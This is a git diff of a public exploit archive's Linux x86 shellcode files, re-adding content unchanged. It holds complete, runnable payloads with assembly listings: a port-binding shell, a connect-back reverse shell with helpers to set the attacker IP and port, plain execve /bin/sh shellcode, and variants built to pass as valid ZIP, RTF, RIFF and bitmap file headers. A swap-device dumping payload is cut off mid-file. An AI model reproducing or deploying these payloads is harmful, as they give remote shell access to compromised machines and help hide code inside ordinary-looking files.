+ 0000001A 52 push edx + 0000001B 53 push ebx + 0000001C 89E1 mov ecx,esp + 0000001E EBE1 jmp short 0x1 + + Find difference between original and dissasembled shellcode ;) +*/ + +#include +#include + +char shellcode[] = "\x68\xcd\x80\x68\x68\xeb\xfc\x68" + "\x6a\x0b\x58\x31\xd2\x52\x68\x2f" + "\x2f\x73\x68\x68\x2f\x62\x69\x6e" + "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"; + +main() { + void (*fp) (void); + fp = (void *) shellcode; + printf ("%d bytes\n", strlen(shellcode)); + fp(); +} + // milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13363.c b/platforms/lin_x86/shellcode/13363.c index b4de012e6..42124ffb7 100755 --- a/platforms/lin_x86/shellcode/13363.c +++ b/platforms/lin_x86/shellcode/13363.c @@ -1,162 +1,162 @@ -/*---------------------------------------------------------------------------* - * 100 byte Portbind shellcode * - * by Benjamin Orozco - benoror@gmail.com * - *---------------------------------------------------------------------------* - * filename: x86-linux-portbind.c * - * discription: x86-linux portbind shellcode. * - * Pretty big but excellent for educational purposes. * - * Use SET_PORT() before using the shellcode. Example: * - * * - * SET_PORT(sc, 31337); * - * * - *___________________________________________________________________________* - *---------------------------------------------------------------------------*/ - -/*---------------------------------------------------------------------------* - * ASM Code * - *---------------------------------------------------------------------------* - -# s = socket(2, 1, 0) -push $0x66 # -pop %eax # 0x66 = socketcall -push $0x1 # -pop %ebx # socket() = 1 -xor %ecx,%ecx # -push %ecx # 0 -push $0x1 # SOCK_STREAM = 1 -push $0x2 # AF_INET = 2 -mov %esp,%ecx # Arguments -int $0x80 # EXECUTE - Now %eax have the s fileDescriptor - -# bind(s [2, 64713, 0], 0x10) -xor %edx,%edx -push %edx # INADDR_ANY = 0 -pushw $0xc9fc # PORT = 64713 -pushw $0x2 # AF_INET = 2 -mov %esp,%ecx # %ecx holds server struct -push $0x10 # sizeof(server) = 10 -push %ecx # server struct -push %eax # s fileDescriptor -mov %esp,%ecx -mov %eax,%esi # now %esi holds s fileDescriptor -push $0x2 # -pop %ebx # bind() = 2 -push $0x66 # -pop %eax # 0x66 = socketcall -int $0x80 # On success: %eax = 0 - -# listen(s, 0) -push $0x66 # -pop %eax # 0x66 = socketcall -push $0x4 # -pop %ebx # listen() = 4 -int $0x80 # On success: %eax = 0 - -# c = accept(s, 0, 0) -xor %ecx,%ecx -push %ecx -push %ecx -push %esi # %esi = s -mov %esp,%ecx # Arguments -push $0x5 # -pop %ebx # accept() = 5 -push $0x66 # -pop %eax # 0x66 = socketcall -int $0x80 # EXECUTE - Now %eax have c fileDescriptor - -# dup2(c, 2) , dup2(c, 1) , dup2(c, 0) -xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()] -push $0x2 -pop %ecx -dup_loop: -mov $0x3f,%al # dup2() = 0x3f -int $0x80 -dec %ecx -jns dup_loop - -# execve("/bin//sh", ["/bin//sh",NULL]) -mov $0xb,%al # execve = 11d -push %edx -push $0x68732f2f -push $0x6e69622f -mov %esp,%ebx -push %edx -push %ebx -mov %esp, %ecx -int $0x80 - -*----------------------------------------------------------------------------*/ - -char sc[] = -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\x6a\x01" //push $0x1 -"\x5b" //pop %ebx -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x6a\x01" //push $0x1 -"\x6a\x02" //push $0x2 -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80" //int $0x80 -"\x31\xd2" //xor %edx,%edx -"\x52" //push %edx -"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT -"\x66\x6a\x02" //pushw $0x2 -"\x89\xe1" //mov %esp,%ecx -"\x6a\x10" //push $0x10 -"\x51" //push %ecx -"\x50" //push %eax -"\x89\xe1" //mov %esp,%ecx -"\x89\xc6" //mov %eax,%esi -"\x6a\x02" //push $0x2 -"\x5b" //pop %ebx -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\xcd\x80" //int $0x80 -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\x6a\x04" //push $0x4 -"\x5b" //pop %ebx -"\xcd\x80" //int $0x80 -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x51" //push %ecx -"\x56" //push %esi -"\x89\xe1" //mov %esp,%ecx -"\x6a\x05" //push $0x5 -"\x5b" //pop %ebx -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\xcd\x80" //int $0x80 -"\x93" //xchg %eax,%ebx -"\x6a\x02" //push $0x2 -"\x59" //pop %ecx -"\xb0\x3f" //mov $0x3f,%al -"\xcd\x80" //int $0x80 -"\x49" //dec %ecx -"\x79\xf9" //jns 48 -"\xb0\x0b" //mov $0xb,%al -"\x52" //push %edx -"\x68\x2f\x2f\x73\x68" //push $0x68732f2f -"\x68\x2f\x62\x69\x6e" //push $0x6e69622f -"\x89\xe3" //mov %esp,%ebx -"\x52" //push %edx -"\x53" //push %ebx -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80"; //int $0x80 - -void SET_PORT(char *buf, int port) { - *(unsigned short *)(((buf)+22)) = (port); - char tmp = buf[22]; - buf[22] = buf[23]; - buf[23] = tmp; -} - -main(){ - printf("size: %d bytes\n", strlen(sc)); - - SET_PORT(sc, 33333); - __asm__("call sc"); -} - +/*---------------------------------------------------------------------------* + * 100 byte Portbind shellcode * + * by Benjamin Orozco - benoror@gmail.com * + *---------------------------------------------------------------------------* + * filename: x86-linux-portbind.c * + * discription: x86-linux portbind shellcode. * + * Pretty big but excellent for educational purposes. * + * Use SET_PORT() before using the shellcode. Example: * + * * + * SET_PORT(sc, 31337); * + * * + *___________________________________________________________________________* + *---------------------------------------------------------------------------*/ + +/*---------------------------------------------------------------------------* + * ASM Code * + *---------------------------------------------------------------------------* + +# s = socket(2, 1, 0) +push $0x66 # +pop %eax # 0x66 = socketcall +push $0x1 # +pop %ebx # socket() = 1 +xor %ecx,%ecx # +push %ecx # 0 +push $0x1 # SOCK_STREAM = 1 +push $0x2 # AF_INET = 2 +mov %esp,%ecx # Arguments +int $0x80 # EXECUTE - Now %eax have the s fileDescriptor + +# bind(s [2, 64713, 0], 0x10) +xor %edx,%edx +push %edx # INADDR_ANY = 0 +pushw $0xc9fc # PORT = 64713 +pushw $0x2 # AF_INET = 2 +mov %esp,%ecx # %ecx holds server struct +push $0x10 # sizeof(server) = 10 +push %ecx # server struct +push %eax # s fileDescriptor +mov %esp,%ecx +mov %eax,%esi # now %esi holds s fileDescriptor +push $0x2 # +pop %ebx # bind() = 2 +push $0x66 # +pop %eax # 0x66 = socketcall +int $0x80 # On success: %eax = 0 + +# listen(s, 0) +push $0x66 # +pop %eax # 0x66 = socketcall +push $0x4 # +pop %ebx # listen() = 4 +int $0x80 # On success: %eax = 0 + +# c = accept(s, 0, 0) +xor %ecx,%ecx +push %ecx +push %ecx +push %esi # %esi = s +mov %esp,%ecx # Arguments +push $0x5 # +pop %ebx # accept() = 5 +push $0x66 # +pop %eax # 0x66 = socketcall +int $0x80 # EXECUTE - Now %eax have c fileDescriptor + +# dup2(c, 2) , dup2(c, 1) , dup2(c, 0) +xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()] +push $0x2 +pop %ecx +dup_loop: +mov $0x3f,%al # dup2() = 0x3f +int $0x80 +dec %ecx +jns dup_loop + +# execve("/bin//sh", ["/bin//sh",NULL]) +mov $0xb,%al # execve = 11d +push %edx +push $0x68732f2f +push $0x6e69622f +mov %esp,%ebx +push %edx +push %ebx +mov %esp, %ecx +int $0x80 + +*----------------------------------------------------------------------------*/ + +char sc[] = +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\x6a\x01" //push $0x1 +"\x5b" //pop %ebx +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x6a\x01" //push $0x1 +"\x6a\x02" //push $0x2 +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80" //int $0x80 +"\x31\xd2" //xor %edx,%edx +"\x52" //push %edx +"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT +"\x66\x6a\x02" //pushw $0x2 +"\x89\xe1" //mov %esp,%ecx +"\x6a\x10" //push $0x10 +"\x51" //push %ecx +"\x50" //push %eax +"\x89\xe1" //mov %esp,%ecx +"\x89\xc6" //mov %eax,%esi +"\x6a\x02" //push $0x2 +"\x5b" //pop %ebx +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\xcd\x80" //int $0x80 +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\x6a\x04" //push $0x4 +"\x5b" //pop %ebx +"\xcd\x80" //int $0x80 +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x51" //push %ecx +"\x56" //push %esi +"\x89\xe1" //mov %esp,%ecx +"\x6a\x05" //push $0x5 +"\x5b" //pop %ebx +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\xcd\x80" //int $0x80 +"\x93" //xchg %eax,%ebx +"\x6a\x02" //push $0x2 +"\x59" //pop %ecx +"\xb0\x3f" //mov $0x3f,%al +"\xcd\x80" //int $0x80 +"\x49" //dec %ecx +"\x79\xf9" //jns 48 +"\xb0\x0b" //mov $0xb,%al +"\x52" //push %edx +"\x68\x2f\x2f\x73\x68" //push $0x68732f2f +"\x68\x2f\x62\x69\x6e" //push $0x6e69622f +"\x89\xe3" //mov %esp,%ebx +"\x52" //push %edx +"\x53" //push %ebx +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80"; //int $0x80 + +void SET_PORT(char *buf, int port) { + *(unsigned short *)(((buf)+22)) = (port); + char tmp = buf[22]; + buf[22] = buf[23]; + buf[23] = tmp; +} + +main(){ + printf("size: %d bytes\n", strlen(sc)); + + SET_PORT(sc, 33333); + __asm__("call sc"); +} + // milw0rm.com [2006-05-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13364.c b/platforms/lin_x86/shellcode/13364.c index c9c032c6c..9f6d5d871 100755 --- a/platforms/lin_x86/shellcode/13364.c +++ b/platforms/lin_x86/shellcode/13364.c @@ -1,134 +1,134 @@ -/*---------------------------------------------------------------------------* - * 82 byte Connectback shellcode * - * by Benjamin Orozco - benoror@gmail.com * - *---------------------------------------------------------------------------* - * filename: x86-linux-connectback.c * - * discription: x86-linux connect back shellcode. Use SET_PORT() and * - * SET_IP() before using the shellcode. Example: * - * * - * SET_IP(sc, "192.168.13.22"); * - * SET_PORT(sc, 31337); * - * * - *___________________________________________________________________________* - *---------------------------------------------------------------------------*/ - -/*---------------------------------------------------------------------------* - * ASM Code * - *---------------------------------------------------------------------------* - -# s = socket(2, 1, 0) -push $0x66 # -pop %eax # 0x66 = socketcall -push $0x1 # -pop %ebx # socket() = 1 -xor %ecx,%ecx # -push %ecx # 0 -push $0x1 # SOCK_STREAM = 1 -push $0x2 # AF_INET = 2 -mov %esp,%ecx # Arguments -int $0x80 # EXECUTE - Now %eax have the s fileDescriptor - -# connect(s, [2, 64713, 127.127.127], 0x10) -push $0x7f7f7f7f # 127.127.127 = 0x7f7f7f7f -pushw $0xc9fc # PORT = 64713 -pushw $0x2 # AF_INET = 2 -mov %esp,%ecx # %ecx holds server struct -push $0x10 # sizeof(server) = 10 -push %ecx # server struct -push %eax # s fileDescriptor -mov %esp,%ecx -mov %eax,%esi # now %esi holds s fileDescriptor [for connect()] -push $0x3 # -pop %ebx # connect() = 3 -push $0x66 # -pop %eax # 0x66 = socketcall -int $0x80 # On success %eax = 0 - -# dup2(s, 2) , dup2(s, 1) , dup2(s, 0) -xchg %esi,%ebx # Put s fileDescriptor on %ebx [for dup2()] -push $0x2 -pop %ecx -dup_loop: -mov $0x3f,%al # dup2() = 0x3f -int $0x80 -dec %ecx -jns dup_loop - -# execve("/bin//sh", ["/bin//sh",NULL]) -mov $0xb,%al # execve = 11d -xor %edx,%edx -push %edx -push $0x68732f2f -push $0x6e69622f -mov %esp,%ebx -push %edx -push %ebx -mov %esp, %ecx -int $0x80 - -*----------------------------------------------------------------------------*/ - -char sc[] = -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\x6a\x01" //push $0x1 -"\x5b" //pop %ebx -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x6a\x01" //push $0x1 -"\x6a\x02" //push $0x2 -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80" //int $0x80 -"\x68\x7f\x7f\x7f\x7f" //push $0x7f7f7f7f //IP -"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT -"\x66\x6a\x02" //pushw $0x2 -"\x89\xe1" //mov %esp,%ecx -"\x6a\x10" //push $0x10 -"\x51" //push %ecx -"\x50" //push %eax -"\x89\xe1" //mov %esp,%ecx -"\x89\xc6" //mov %eax,%esi -"\x6a\x03" //push $0x3 -"\x5b" //pop %ebx -"\x6a\x66" //push $0x66 -"\x58" //pop %eax -"\xcd\x80" //int $0x80 -"\x87\xf3" //xchg %esi,%ebx -"\x6a\x02" //push $0x2 -"\x59" //pop %ecx -"\xb0\x3f" //mov $0x3f,%al -"\xcd\x80" //int $0x80 -"\x49" //dec %ecx -"\x79\xf9" //jns 34 -"\xb0\x0b" //mov $0xb,%al -"\x31\xd2" //xor %edx,%edx -"\x52" //push %edx -"\x68\x2f\x2f\x73\x68" //push $0x68732f2f -"\x68\x2f\x62\x69\x6e" //push $0x6e69622f -"\x89\xe3" //mov %esp,%ebx -"\x52" //push %edx -"\x53" //push %ebx -"\x89\xe1" //mov %esp,%ecx -"\xcd\x80"; //int $0x80 - -void SET_PORT(char *buf, int port) { - *(unsigned short *)(((buf)+24)) = (port); - char tmp = buf[24]; - buf[24] = buf[25]; - buf[25] = tmp; -} - -void SET_IP(char *buf, char *ip) { - unsigned long backip = inet_addr(ip); - *(unsigned long *)(((buf)+18)) = (backip); -} - -main(){ - printf("size: %d bytes\n", strlen(sc)); - - SET_PORT(sc, 33333); - SET_IP(sc, "127.0.0.1"); - __asm__("call sc"); -} - +/*---------------------------------------------------------------------------* + * 82 byte Connectback shellcode * + * by Benjamin Orozco - benoror@gmail.com * + *---------------------------------------------------------------------------* + * filename: x86-linux-connectback.c * + * discription: x86-linux connect back shellcode. Use SET_PORT() and * + * SET_IP() before using the shellcode. Example: * + * * + * SET_IP(sc, "192.168.13.22"); * + * SET_PORT(sc, 31337); * + * * + *___________________________________________________________________________* + *---------------------------------------------------------------------------*/ + +/*---------------------------------------------------------------------------* + * ASM Code * + *---------------------------------------------------------------------------* + +# s = socket(2, 1, 0) +push $0x66 # +pop %eax # 0x66 = socketcall +push $0x1 # +pop %ebx # socket() = 1 +xor %ecx,%ecx # +push %ecx # 0 +push $0x1 # SOCK_STREAM = 1 +push $0x2 # AF_INET = 2 +mov %esp,%ecx # Arguments +int $0x80 # EXECUTE - Now %eax have the s fileDescriptor + +# connect(s, [2, 64713, 127.127.127], 0x10) +push $0x7f7f7f7f # 127.127.127 = 0x7f7f7f7f +pushw $0xc9fc # PORT = 64713 +pushw $0x2 # AF_INET = 2 +mov %esp,%ecx # %ecx holds server struct +push $0x10 # sizeof(server) = 10 +push %ecx # server struct +push %eax # s fileDescriptor +mov %esp,%ecx +mov %eax,%esi # now %esi holds s fileDescriptor [for connect()] +push $0x3 # +pop %ebx # connect() = 3 +push $0x66 # +pop %eax # 0x66 = socketcall +int $0x80 # On success %eax = 0 + +# dup2(s, 2) , dup2(s, 1) , dup2(s, 0) +xchg %esi,%ebx # Put s fileDescriptor on %ebx [for dup2()] +push $0x2 +pop %ecx +dup_loop: +mov $0x3f,%al # dup2() = 0x3f +int $0x80 +dec %ecx +jns dup_loop + +# execve("/bin//sh", ["/bin//sh",NULL]) +mov $0xb,%al # execve = 11d +xor %edx,%edx +push %edx +push $0x68732f2f +push $0x6e69622f +mov %esp,%ebx +push %edx +push %ebx +mov %esp, %ecx +int $0x80 + +*----------------------------------------------------------------------------*/ + +char sc[] = +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\x6a\x01" //push $0x1 +"\x5b" //pop %ebx +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x6a\x01" //push $0x1 +"\x6a\x02" //push $0x2 +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80" //int $0x80 +"\x68\x7f\x7f\x7f\x7f" //push $0x7f7f7f7f //IP +"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT +"\x66\x6a\x02" //pushw $0x2 +"\x89\xe1" //mov %esp,%ecx +"\x6a\x10" //push $0x10 +"\x51" //push %ecx +"\x50" //push %eax +"\x89\xe1" //mov %esp,%ecx +"\x89\xc6" //mov %eax,%esi +"\x6a\x03" //push $0x3 +"\x5b" //pop %ebx +"\x6a\x66" //push $0x66 +"\x58" //pop %eax +"\xcd\x80" //int $0x80 +"\x87\xf3" //xchg %esi,%ebx +"\x6a\x02" //push $0x2 +"\x59" //pop %ecx +"\xb0\x3f" //mov $0x3f,%al +"\xcd\x80" //int $0x80 +"\x49" //dec %ecx +"\x79\xf9" //jns 34 +"\xb0\x0b" //mov $0xb,%al +"\x31\xd2" //xor %edx,%edx +"\x52" //push %edx +"\x68\x2f\x2f\x73\x68" //push $0x68732f2f +"\x68\x2f\x62\x69\x6e" //push $0x6e69622f +"\x89\xe3" //mov %esp,%ebx +"\x52" //push %edx +"\x53" //push %ebx +"\x89\xe1" //mov %esp,%ecx +"\xcd\x80"; //int $0x80 + +void SET_PORT(char *buf, int port) { + *(unsigned short *)(((buf)+24)) = (port); + char tmp = buf[24]; + buf[24] = buf[25]; + buf[25] = tmp; +} + +void SET_IP(char *buf, char *ip) { + unsigned long backip = inet_addr(ip); + *(unsigned long *)(((buf)+18)) = (backip); +} + +main(){ + printf("size: %d bytes\n", strlen(sc)); + + SET_PORT(sc, 33333); + SET_IP(sc, "127.0.0.1"); + __asm__("call sc"); +} + // milw0rm.com [2006-05-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13365.c b/platforms/lin_x86/shellcode/13365.c index 237ed6aac..bcabbe72e 100755 --- a/platforms/lin_x86/shellcode/13365.c +++ b/platforms/lin_x86/shellcode/13365.c @@ -1,32 +1,32 @@ -/* - * [Linux/x86] - * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL) - * 24 bytes - * hophet [at] gmail.com - * http://www.nlabs.com.br/~hophet/ - * - */ - -char shellcode[] = - -"\x99" // cltd -"\x31\xc0" // xor %eax,%eax -"\x52" // push %edx -"\x68\x6e\x2f\x73\x68" // push $0x68732f6e -"\x68\x2f\x2f\x62\x69" // push $0x69622f2f -"\x89\xe3" // mov %esp,%ebx -"\x52" // push %edx -"\x53" // push %ebx -"\x89\xe1" // mov %esp,%ecx -"\xb0\x0b" // mov $0xb,%al -"\xcd\x80"; // int $0x80 - -int main() { - - void (*p)(); - p = (void *)&shellcode; - printf("Lenght: %d\n", strlen(shellcode)); - p(); -} - +/* + * [Linux/x86] + * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL) + * 24 bytes + * hophet [at] gmail.com + * http://www.nlabs.com.br/~hophet/ + * + */ + +char shellcode[] = + +"\x99" // cltd +"\x31\xc0" // xor %eax,%eax +"\x52" // push %edx +"\x68\x6e\x2f\x73\x68" // push $0x68732f6e +"\x68\x2f\x2f\x62\x69" // push $0x69622f2f +"\x89\xe3" // mov %esp,%ebx +"\x52" // push %edx +"\x53" // push %ebx +"\x89\xe1" // mov %esp,%ecx +"\xb0\x0b" // mov $0xb,%al +"\xcd\x80"; // int $0x80 + +int main() { + + void (*p)(); + p = (void *)&shellcode; + printf("Lenght: %d\n", strlen(shellcode)); + p(); +} + // milw0rm.com [2006-05-01] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13367.c b/platforms/lin_x86/shellcode/13367.c index 371c00cdc..6471d0df1 100755 --- a/platforms/lin_x86/shellcode/13367.c +++ b/platforms/lin_x86/shellcode/13367.c @@ -1,42 +1,42 @@ -/* - * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + ZIP Header - 28 bytes - * - * root@magicbox:~# file linux-sh-ziphdr.bin - * linux-sh-ziphdr.bin: Zip archive data - * - * - izik - */ - -char shellcode[] = - - // - // ZIP Header (5 bytes) - // - - "\x50" // push %eax - "\x4b" // dec %ebx - "\x03\x04\x24" // add (%esp),%eax - - // - // execve("/bin/sh", ["/bin/sh", NULL]); - // - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + ZIP Header - 28 bytes + * + * root@magicbox:~# file linux-sh-ziphdr.bin + * linux-sh-ziphdr.bin: Zip archive data + * + * - izik + */ + +char shellcode[] = + + // + // ZIP Header (5 bytes) + // + + "\x50" // push %eax + "\x4b" // dec %ebx + "\x03\x04\x24" // add (%esp),%eax + + // + // execve("/bin/sh", ["/bin/sh", NULL]); + // + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13368.c b/platforms/lin_x86/shellcode/13368.c index 11a41f933..b64c1cee0 100755 --- a/platforms/lin_x86/shellcode/13368.c +++ b/platforms/lin_x86/shellcode/13368.c @@ -1,43 +1,43 @@ -/* - * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RTF header - 30 bytes - * - * root@magicbox:~# file linux-sh-rtfhdr.bin - * linux-sh-rtfhdr.bin: Rich Text Format data, version 1, - * - * - izik - */ - -char shellcode[] = - - // - // RTF Header (7 bytes) - // - Be careful not to trigger any of those expressions. - // - - "\x7b\x5c" // jnp 80480d2 <_start+0x5e> - "\x72\x74" // jb 80480ec <_start+0x78> - "\x66\x31\xc0" // xor %ax,%ax - - // - // execve("/bin/sh", ["/bin/sh", NULL]); - // - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RTF header - 30 bytes + * + * root@magicbox:~# file linux-sh-rtfhdr.bin + * linux-sh-rtfhdr.bin: Rich Text Format data, version 1, + * + * - izik + */ + +char shellcode[] = + + // + // RTF Header (7 bytes) + // - Be careful not to trigger any of those expressions. + // + + "\x7b\x5c" // jnp 80480d2 <_start+0x5e> + "\x72\x74" // jb 80480ec <_start+0x78> + "\x66\x31\xc0" // xor %ax,%ax + + // + // execve("/bin/sh", ["/bin/sh", NULL]); + // + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13369.c b/platforms/lin_x86/shellcode/13369.c index 4e96d845d..7bf0d69e6 100755 --- a/platforms/lin_x86/shellcode/13369.c +++ b/platforms/lin_x86/shellcode/13369.c @@ -1,44 +1,44 @@ -/* - * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RIFF Header - 28 bytes - * - * root@magicbox:~# file linux-sh-riffhdr.bin - * linux-sh-riffhdr.bin: RIFF (little-endian) data - * - * - izik - */ - -char shellcode[] = - - // - // RIFF Header (5 bytes) - // - - "\x52" // push %edx - "\x49" // dec %ecx - "\x46" // inc %esi - "\x46" // inc %esi - "\x40" // inc %eax - - // - // execve("/bin/sh", ["/bin/sh", NULL]); - // - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + RIFF Header - 28 bytes + * + * root@magicbox:~# file linux-sh-riffhdr.bin + * linux-sh-riffhdr.bin: RIFF (little-endian) data + * + * - izik + */ + +char shellcode[] = + + // + // RIFF Header (5 bytes) + // + + "\x52" // push %edx + "\x49" // dec %ecx + "\x46" // inc %esi + "\x46" // inc %esi + "\x40" // inc %eax + + // + // execve("/bin/sh", ["/bin/sh", NULL]); + // + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13370.c b/platforms/lin_x86/shellcode/13370.c index ce9942125..2e4e35770 100755 --- a/platforms/lin_x86/shellcode/13370.c +++ b/platforms/lin_x86/shellcode/13370.c @@ -1,43 +1,43 @@ -/* - * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes - * - * root@magicbox:~# file linux-sh-bm24bhdr.bin - * linux-sh-bm24bhdr.bin: PC bitmap data - * - * - izik - */ - -char shellcode[] = - - // - // Bitmap 24bit Header (4 bytes) - // - - "\x42" // inc %edx - "\x4d" // dec %ebp - "\x36" // ss - "\x91" // xchg %eax,%ecx - - // - // execve("/bin/sh", ["/bin/sh", NULL]); - // - - "\x6a\x0b" // push $0xb - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes + * + * root@magicbox:~# file linux-sh-bm24bhdr.bin + * linux-sh-bm24bhdr.bin: PC bitmap data + * + * - izik + */ + +char shellcode[] = + + // + // Bitmap 24bit Header (4 bytes) + // + + "\x42" // inc %edx + "\x4d" // dec %ebp + "\x36" // ss + "\x91" // xchg %eax,%ecx + + // + // execve("/bin/sh", ["/bin/sh", NULL]); + // + + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13371.c b/platforms/lin_x86/shellcode/13371.c index 754a2997c..da03fed46 100755 --- a/platforms/lin_x86/shellcode/13371.c +++ b/platforms/lin_x86/shellcode/13371.c @@ -1,112 +1,112 @@ -/* - * linux-x86-swap-restore.c - SWAP restore shellcode 109 bytes for Linux/x86 - * Copyright (c) 2006 Gotfault Security & rfdslabs - * - * Authors: - * - * dx - * spud - * - * This shellcode reads the swap device at offset 31337. After it searchs by - * NULL byte, it stops and write the readed content to '/tmp/swr' file. - * Probaly you needs to change the device path name in open() device syscall. - * - */ - -char shellcode[] = - - /* open(device, O_RDONLY) */ - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x99" // cltd - "\x52" // push %edx - "\x68\x73\x64\x61\x31" // push $0x31616473 - "\x68\x64\x65\x76\x2f" // push $0x2f766564 - "\x66\x68\x2f\x2f" // pushw $0x2f2f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x59" // pop %ecx - "\xcd\x80" // int $0x80 - - "\x93" // 